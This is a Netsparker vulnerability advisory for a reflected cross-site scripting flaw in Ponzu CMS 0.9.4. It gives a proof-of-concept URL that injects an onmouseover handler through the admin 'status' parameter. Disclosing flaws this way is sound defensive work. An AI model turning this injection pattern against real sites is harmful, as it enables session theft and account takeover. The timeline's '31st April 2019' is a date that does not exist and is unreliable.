Information
--------------------
Advisory by Netsparker
Name: Reflected Cross-site Scripting in Ponzu CMS
Affected Software: Ponzu
Affected Versions: 0.9.4
Homepage: https://docs.ponzu-cms.org/
Vulnerability: Reflected Cross-site Scripting
Severity: High
Status: Not Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-19-005

Technical Details
--------------------

Reflected XSS

URL : http://{DOMAIN}/admin/contents?count=1&offset=-1&order=desc&status=x"
onmouseover=netsparker(0x001194) x="&type=Song
Parameter Name : status
Parameter Type : GET
Attack Patern : x" onmouseover=netsparker(0x001194) x="

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

26th February 2019 - First Contact
27th February 2019 - Technical Details Sent
31st April 2019 - Vendor Requests PR of the Technical Details
12th June 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Yusuf Şahin while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.